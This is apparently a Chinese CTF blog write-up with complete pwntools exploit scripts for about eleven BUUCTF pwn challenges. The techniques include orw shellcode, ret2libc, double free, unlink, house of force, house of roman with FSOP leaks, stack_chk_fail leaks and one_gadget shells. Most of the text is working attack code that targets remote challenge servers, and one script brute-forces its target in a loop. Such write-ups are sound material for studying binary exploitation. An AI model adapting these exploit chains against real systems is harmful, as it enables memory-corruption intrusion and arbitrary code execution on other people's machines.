BUUCTF-pwn(12)

[极客大挑战 2019]Not Bad

orw类型，打开文件，读入内容，输出内容！但需要注意gadget！

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './bad'
r = remote('node4.buuoj.cn',29934)
#r = process(binary)
elf = ELF(binary)
mnap = 0x123000
jmp_rsp = 0x0400a01
r.recvuntil("Easy shellcode, have fun!\n")
shellcode = asm(shellcraft.read(0,mnap,0x100))
shellcode += asm('mov rax,0x123000;call rax')
payload = shellcode.ljust(0x28,b'a')+p64(jmp_rsp)+asm("sub rsp,0x30;jmp rsp")#此处调整栈帧，类似leave_ret
#gdb.attach(r)
r.send(payload)

payload2 = asm(shellcraft.open('./flag')+shellcraft.read('rax',mnap+0x100,0x100)+shellcraft.write(1,mnap+0x100,0x100))
r.send(payload2)#此时打印flag

r.interactive()

---

cmcc_pwnme1

简单的ret2libc！存在后面函数，但是无法得到flag，故采用ret2libc！

from pwn import *
from LibcSearcher import *
context(log_level='debug',os='linux',arch='i386')

binary = './pwnme1'
r = remote('node4.buuoj.cn',27058)
#r = process(binary)
elf = ELF(binary)
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
start_addr = 0x08048570


#gdb.attach(r,'b *0x8048656')
r.sendlineafter(">> 6. Exit    \n",'5')
payload = b'a'*0xa4+b'cccc'+p32(puts_plt)+p32(start_addr)+p32(puts_got)
r.sendline(payload)
r.recvline()
puts_addr = u32(r.recv(4))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr-libc.dump('puts')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
log.warn("puts_addr -> "+hex(puts_addr))
r.sendlineafter(">> 6. Exit    \n",'5')
payload2 = b'a'*0xa4+b'cccc'+p32(system)+p32(sh)+p32(sh)
r.sendline(payload2)

r.interactive()

---

wustctf2020_name_your_cat

本题存在数组越界访问写入，故可以修改eip内容，而不触发canary保护机制！

from elftools.construct.adapters import IndexingAdapter
from pwn import *
from LibcSearcher import *
context(log_level='debug',os='linux',arch='i386')

binary = './wustctf2020_name_your_cat'
r = remote('node4.buuoj.cn',26324)
#r = process(binary)
elf = ELF(binary)
shell = 0x080485CB

def leak(index,payload):
    sleep(0.1)
    r.sendline(str(index))
    r.recvuntil("Give your name plz: ")
    r.send(payload)

#gdb.attach(r,'b *0x080486F5')
sleep(0.5)
leak(7,p32(shell)+b'\n')
for i in range(4):
    leak(1,b'njh\n')

r.interactive()

---

gyctf_2020_some_thing_exceting

分析主要函数！

Allocate申请函数！

Free释放函数存在UAF漏洞！

Show打印函数！

本题主要采用double free攻击手法，可以发现bss段上存在flag，故我们可以采取double free攻击手法得到bss上的flag，且无PIE保护！唯一需要注意的是，（打印flag为二次间接寻址）

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './gyctf_2020_some_thing_exceting'
r = remote('node4.buuoj.cn',25610)
#r = process(binary)
elf = ELF(binary)
bss_addr = 0x0602040
flag = 0x06020A8
def Allcode(size1=0x18,size2=0x18,payload1='\n',payload2='\n'):
    r.sendlineafter("> Now please tell me what you want to do :",'1')
    r.sendlineafter("> ba's length : ",str(size1))
    r.sendafter("> ba : ",payload1)
    r.sendlineafter("> na's length : ",str(size2))
    r.sendafter("> na : ",payload2)

def Free(index):
    r.sendlineafter("> Now please tell me what you want to do :",'3')
    r.sendlineafter("> Banana ID : ",str(index))

def Show(index):
    r.sendlineafter("> Now please tell me what you want to do :",'4')
    r.sendlineafter("> SCP project ID : ",str(index))

Allcode(0x38,0x68)#0
Allcode(0x38,0x68)#1
Allcode()#2

Free(0)
Free(1)
Free(0)
Allcode(0x68,0x68,p64(bss_addr-0x13))
Allcode(0x68,0x68,b'\n',b'a'*3+p64(bss_addr+0x10)+p64(bss_addr+0x10)+p64(flag))
#gdb.attach(r,'b *0x0400D2E')
Show(0)

r.interactive()

---

wdb2018_guess

本题原本思路为爆破，但经过实践发现该方法难以实现！

应共进行程序三次，故我们采用__stack_chk_fail的攻击手法，于libc2.23版本中，会打印出argv[0]的数值，我们可以覆盖argv[0]进而泄露出libc地址，从而得到environ地址，第二次故可以泄露栈地址，第三次则可以泄露出flag！

from pwn import *
from LibcSearcher import LibcSearcher
context(log_level='debug',os='linux')

binary = './GUESS'
r = remote('node4.buuoj.cn',26836)
#r = process(binary)
elf = ELF(binary)
puts_got = elf.got['puts']

r.recvuntil("Please type your guessing flag")
payload = b'a'*0x128+p64(puts_got)
#gdb.attach(r)
r.sendline(payload)
r.recvuntil("stack smashing detected ***: ")
puts_addr = u64(r.recv(6).ljust(8,b'\x00'))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr-libc.dump('puts')
environ_addr = libc_base+libc.dump('environ')
log.warn("libc_base -> "+hex(libc_base))

payload2 = b'a'*0x128+p64(environ_addr)
r.sendline(payload2)
r.recvuntil("stack smashing detected ***: ")
stack_addr = u64(r.recv(6).ljust(8,b'\x00'))-0x168
log.warn("stack_addr -> "+hex(stack_addr))
#gdb.attach(r)
payload3 = b'a'*0x128+p64(stack_addr)
r.sendline(payload3)


r.interactive()

---

axb_2019_heap

分析主要函数！

Allocate申请函数！

Free释放函数

Edit编辑函数存在off by one漏洞

首先通过格式化字符串漏洞泄露地址，故我们采用Unlink，修改bss段上全局变量，从而修改__free_hook为system函数。

该脚本本地libc2.23可以运行，但是远程会发生*** Error in `./pwn/pwn’: corrupted size vs. prev_size: 0x000055e5d42b0010 ***错误！
远程成功脚本位于末尾！

from pwn import *
from LibcSearcher import LibcSearcher
context(os='linux',arch='amd64',log_level='debug')

binary = './axb_2019_heap'
#r = remote('node4.buuoj.cn',27804)
r = process(binary)
elf = ELF(binary)
#libc = ELF('./libc-2.23.so')
def Allcote(index,size=0x98,payload=b'abcdef\n'):
    r.sendlineafter(">> ",'1')
    r.sendlineafter("(0-10):",str(index))
    r.sendlineafter("Enter a size:",str(size))
    r.sendafter("Enter the content: ",payload)

def Free(index):
    r.sendlineafter(">> ",'2')
    r.sendlineafter("Enter an index:\n",str(index))

def Edit(index,payload):
    r.sendlineafter(">> ",'4')
    r.sendlineafter("Enter an index:\n",str(index))
    r.sendlineafter("Enter the content: ",payload)

def leak():
    global main
    global libc
    global libc_base
    r.recvuntil("Enter your name: ")
    payload = b'%15$p.%19$p'#7 19
    r.sendline(payload)
    r.recvuntil("0x")
    libc_start_main = int(r.recv(12),16)-240
    r.recvuntil("0x")
    main = int(r.recv(12),16)#-0x0116A
    libc = LibcSearcher('__libc_start_main',libc_start_main)
    libc_base = libc_start_main-libc.dump('__libc_start_main')
    log.warn("main -> "+hex(main))
    log.warn("libc_base -> "+hex(libc_base))


leak()
#gdb.attach(r)
#sleep(1)
note_addr = main+0x200EF6
free_hook = libc_base+libc.dump('__free_hook')
system = libc_base+libc.dump('system')
Allcote(0)
Allcote(1)
Allcote(2,0x90,b'/bin/sh\x00\n')
Allcote(3,0x90,b'/bin/sh\x00\n')
Allcote(4,0x90,b'/bin/sh\x00\n')

target = note_addr#+0x30
fd  =target-0x18
bk = target-0x10
Edit(0,p64(0)+p64(0x81)+p64(fd)+p64(bk)+p64(0)*14+p64(0x90)+p8(0xa0))
Free(1)#1
#gdb.attach(r)
Edit(0,p64(0)*3+p64(free_hook)+p64(0x10))
Edit(0,p64(system))
log.warn("target -> "+hex(target))
#gdb.attach(r)
Free(4)

r.interactive()

经过修改后，使用libc的偏移量，不再使用LibcSearcher查找libc库，则成功获取权限！

from pwn import *
from LibcSearcher import LibcSearcher
context(os='linux',arch='amd64',log_level='debug')

binary = './axb_2019_heap'
r = remote('node4.buuoj.cn',27804)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.23.so')
def Allcote(index,size=0x98,payload=b'abcdef\n'):
    r.sendlineafter(">> ",'1')
    r.sendlineafter("(0-10):",str(index))
    r.sendlineafter("Enter a size:",str(size))
    r.sendafter("Enter the content: ",payload)

def Free(index):
    r.sendlineafter(">> ",'2')
    r.sendlineafter("Enter an index:\n",str(index))

def Edit(index,payload):
    r.sendlineafter(">> ",'4')
    r.sendlineafter("Enter an index:\n",str(index))
    r.sendlineafter("Enter the content: ",payload)

def leak():
    global base
    global libc
    global libc_base
    r.recvuntil("Enter your name: ")
    payload = b'%15$p.%19$p'#7 19
    #gdb.attach(r)
    r.sendline(payload)
    r.recvuntil("0x")
    libc_start_main = int(r.recv(12),16)-240
    r.recvuntil("0x")
    base = int(r.recv(12),16)-0x0116A
    libc_base = libc_start_main-libc.symbols['__libc_start_main']
    log.warn("base -> "+hex(base))
    log.warn("libc_base -> "+hex(libc_base))


leak()
#gdb.attach(r)
sleep(1)
note_addr = base+0x0202060
free_hook = libc_base+libc.symbols['__free_hook']
system = libc_base+libc.symbols['system']
Allcote(0)
Allcote(1)
Allcote(2,0x90,b'/bin/sh\x00\n')

target = note_addr
fd = target-0x18
bk = target-0x10
Edit(0,p64(0)+p64(0x91)+p64(fd)+p64(bk)+p64(0)*14+p64(0x90)+p8(0xa0))
Free(1)

Edit(0,p64(0)*3+p64(free_hook)+p64(0x10))
Edit(0,p64(system))
success(hex(target))
success(hex(free_hook))
#gdb.attach(r)
Free(2)

r.interactive()

---

oneshot_tjctf_2016

from pwn import *
from LibcSearcher import LibcSearcher
context(log_level='debug',os='linux',arch='amd64')

binary = './oneshot_tjctf_2016'
r = remote('node4.buuoj.cn',27321)
#r = process(binary)
elf = ELF(binary)
puts_got = elf.got['puts']

r.recvuntil("Read location?\n")
r.sendline(str(puts_got))
r.recvuntil("0x")
puts_addr = int(r.recv(16),16)
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr-libc.dump('puts')
one = [0x45216,0x4526a,0xf02a4,0xf1147]
success(hex(libc_base))
sleep(0.1)
r.sendline(str(libc_base+one[0]))

r.interactive()

---

gyctf_2020_force（House of force）

House of force
main主要函数

Allocate申请函数

可以看到，发现存在堆溢出漏洞，但是仅仅存在一个Allocate函数，而且全保护开启，故我们选择覆写__malloc_hook方法进行攻击。此时我们首先申请0x200000大小的chunk，故会nmap申请到libc低地址处，且偏移量为固定数值，所以我们便可以得到libc_base基地址，此时我们进而修改top_chunk大小的size，从而申请到__malloc_hook地址处，此时我们可以写入__realloc_hook地址one_gadget，__malloc_hook为realloc+0x4。

from pwn import *
from LibcSearcher import LibcSearcher
context(log_level='debug',os='linux',arch='amd64')

binary = './gyctf_2020_force'
r = remote('node4.buuoj.cn',29838)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.23.so')

def Allocate(size=0x18,payload='\n'):
    r.sendlineafter("2:puts\n",'1')
    r.sendlineafter("size\n",str(size))
    r.recvuntil("bin addr 0x")
    chunk_addr = int(r.recv(12),16)
    r.sendafter("content\n",payload)
    return chunk_addr

libc_base = Allocate(0x200000)+0x200FF0#0
heap_base = Allocate(0x18,b'a'*0x10+p64(0)+p64(0xffffffffffffffff))+0x10
malloc_hook = libc_base+libc.symbols['__malloc_hook']#+0x3C3B10
size = malloc_hook-0x30 -heap_base
realloc = libc_base+libc.symbols['__libc_realloc']#+0x83C40#+libc.symbols['__GI___libc_realloc']
one = [0x45206,0x4525a,0xef9f4,0xf0897,0x45216,0x4526a,0xf02a4,0xf1147]

Allocate(size)
Allocate(0x30,b'a'*0x8+p64(libc_base+one[5])+p64(realloc+4))

success("libc_base -> "+hex(libc_base))
success("heap_base - >"+hex(heap_base))
#gdb.attach(r)
r.sendlineafter("2:puts\n",'1')
r.sendlineafter("size\n",'10')

r.interactive()

---

zctf2016_note2

分析主要函数！

Allocate申请函数！

Show打印函数！

Edit编辑函数！

Free释放函数！

该题目采用Unlink攻击手法，但是需要注意几点，输入时需要输入b’/n’，该位置会置零，且strncat拼接时遇到’\x00’会发生截断！但是可以输入0x8f字节！
故我们需要由后向前进行布局！从而Unlink！

from pwn import *
from LibcSearcher import LibcSearcher
context(log_level='debug',os='linux',arch='amd64')

binary = './note2'
r = remote('node4.buuoj.cn',28005)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.23.so')
free_got = elf.got['free']
bss_note = 0x602120
def Allocate(size=0x18,payload='\n'):
    r.sendlineafter("option--->>\n",'1')
    r.sendlineafter("(less than 128)\n",str(size))
    r.sendafter("Input the note content:",payload)

def Show(index):
    r.sendlineafter("option--->>\n",'2')
    r.sendlineafter("note:\n",str(index))

def Edit(index,choice,payload):
    r.sendlineafter("option--->>\n",'3')
    r.sendlineafter("note:\n",str(index))
    r.sendlineafter("[1.overwrite/2.append]\n",str(choice))
    r.sendlineafter("TheNewContents:",payload)

def Free(index):
    r.sendlineafter("option--->>\n",'4')
    r.sendlineafter("note:\n",str(index))

def start():
    r.sendlineafter("Input your name:",b'n'*0x30)
    r.sendlineafter("Input your address:",b'h'*0x50)

start()
Allocate(0x80)#0
Allocate(0)#1
Allocate(0x80)#2
Allocate(0x80,b'/bin/sh\n')

Edit(1,1,b'b'*0x18+p8(0x90)+b'\n')
for i in range(1,8):
    Edit(1,1,b'b'*(0x18-i)+b'\n')
Edit(1,1,b'a'*0x10+p8(0xa0)+b'\n')

target = bss_note
fd = target-0x18
bk = target-0x10
Edit(0,1,b'c'*0x18+p64(bk))#bk
for i in range(1,5):
    Edit(0,1,b'd'*(0x18-i)+b'\n')
Edit(0,1,b'e'*0x10+p64(fd)+b'\n')#fd
for i in range(1,7):
    Edit(0,1,b'd'*(0x10-i)+b'\n')
Edit(0,1,b'd'*0x8+p64(0xa1))

Free(2)#2

Edit(0,1,b'f'*0x18+p32(free_got)+b'\n')
Show(0)
free_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc = LibcSearcher('free',free_addr)
libc_base = free_addr-libc.dump('free')
system = libc_base+libc.dump('system')
log.info("free_addr -> "+hex(free_addr))
Edit(0,1,p64(system)+b'\n')
success(hex(target))
#gdb.attach(r)
Free(3)

r.interactive()

---

linkctf_2018.7_babypie

简单的泄露加栈溢出，唯一需要注意的是便是，开启了PIE保护，但是低地址是相同！

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './babypie'
r = remote('node4.buuoj.cn',26334)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.23.so')

r.recvuntil("Input your Name:\n")
r.send(b'a'*0x28+b'c')
r.recvuntil("aaaac")
canary = u64(r.recv(7).rjust(8,b'\x00'))
#gdb.attach(r)
sleep(0.1)
r.send(b'a'*0x28+p64(canary)+p64(0)+p8(0x3e))
success(hex(canary))

r.interactive()

---

npuctf_2020_bad_guy（House_of_Roman）

House_of_Roman
首先分析函数！

Allocate申请函数！

Edit编辑函数！

Free函数！

本题采用些许特殊的手段，故会进行细致分析，大致流程为Unlink，爆破fd指向 IO_2_1_stdin，从而可以得到libc_base基地址，从而计算出__malloc_hook，写入one_gadget，再次申请则会获取权限！

Allocate(0,0x18)
Allocate(1,0xc8)
Allocate(2,0x68)
Edit(1,b’a’*0x68+p64(0x61))
Free(1)
Allocate(1,0xc8,b’\xdd\x85’)
Allocate(3,0x68)
Allocate(4,0x68)
Edit(0,b’b’*0x18+p64(0x71))
首先申请三块chunk，对chunk1进行布局，重新申请并修改低字节指向 IO_2_1_stderr +157，此时对chunk1修改size为0x71，故我们便得到了一块伪造的chunk！

Free(2)
Free(4)
Edit(3,b’c’*0x68+p64(0x71)+b’\x20’)
此时释放chunk2与chunk4，并覆写chunk4的fd指针，从而得到一个fastbins[0x70]的链表

Allocate(2,0x68)
Allocate(4,0x68)
payload = b’\x00’*0x33+p64(0xfbad1887)+p64(0)*3+b’\x88’
Allocate(5,0x68,payload)
此时申请到libc之中的chunk，从而覆写_flags为0xfbad1887(行为为进行打印)，并将_IO_read_ptr、_IO_read_end、_IO_read_base置零，修改_IO_write_base低位为0x88


Free(1)
Edit(0,b’a’*0x18+p64(0x71)+p64(malloc_hook-0x23))
Allocate(6,0x68)
Allocate(7,0x68,b’a’*0x13+p64(libc.address+0xf1147))
此时重新Unlink，申请得到malloc_hook-0x23处chunk，进而修改malloc_hook内容为one_gadget，再次生气进而可以获取权限！

以上便是调试流程，但是低字节却并不一定如我们所料想的，故需要不断进行爆破！

from pwn import *
from LibcSearcher import LibcSearcher
context(os='linux',arch='amd64')

binary = './npuctf_2020_bad_guy'
r = remote('node4.buuoj.cn',25298)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.23.so')
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
one = [0x45206,0x4525a,0xef9f4,0xf0897]
def Allocate(index,size=0x18,payload='\n'):
    r.sendlineafter(">> ",'1')
    r.sendlineafter("Index :",str(index))
    r.sendlineafter("size: ",str(size))
    r.sendafter("Content:",payload)

def Edit(index,payload):
    r.sendlineafter(">> ",'2')
    r.sendlineafter("Index :",str(index))
    r.sendlineafter("size: ",str(len(payload)))
    r.sendlineafter("content: ",payload)

def Free(index):
    r.sendlineafter(">> ",'3')
    r.sendlineafter("Index :",str(index))


def pwn():
    Allocate(0,0x18)
    Allocate(1,0xc8)
    Allocate(2,0x68)
    Edit(1,b'a'*0x68+p64(0x61))
    Free(1)
    Allocate(1,0xc8,b'\xdd\x85')
    Allocate(3,0x68)
    Allocate(4,0x68)
    Edit(0,b'b'*0x18+p64(0x71))
    Free(2)
    Free(4)

    Edit(3,b'c'*0x68+p64(0x71)+b'\x20')
    Allocate(2,0x68)
    Allocate(4,0x68)
    payload = b'\x00'*0x33+p64(0xfbad1887)+p64(0)*3+b'\x88'
    Allocate(5,0x68,payload)

    libc.address = u64(r.recvuntil('\x7f').ljust(8,b'\x00'))-libc.sym['_IO_2_1_stdin_']
    malloc_hook = libc.sym['__malloc_hook']
    success("libc_base -> "+hex(libc.address))
    success("__malloc_hook -> "+hex(malloc_hook))
    Free(1)
    Edit(0,b'a'*0x18+p64(0x71)+p64(malloc_hook-0x23))
    Allocate(6,0x68)
    Allocate(7,0x68,b'a'*0x13+p64(libc.address+0xf1147))
    #gdb.attach(r)
    r.sendlineafter(">> ",'1')
    r.sendlineafter("Index :",'2')
    r.sendlineafter("size: ",'96')
    sleep(0.3)
    r.sendline("cat flag")
    print(r.recv())
    pause()
    r.interactive()


while True:
    r = remote('node4.buuoj.cn',25298)
    #r = process(binary)
    try:
        pwn()
    except:
        r.close()
        pass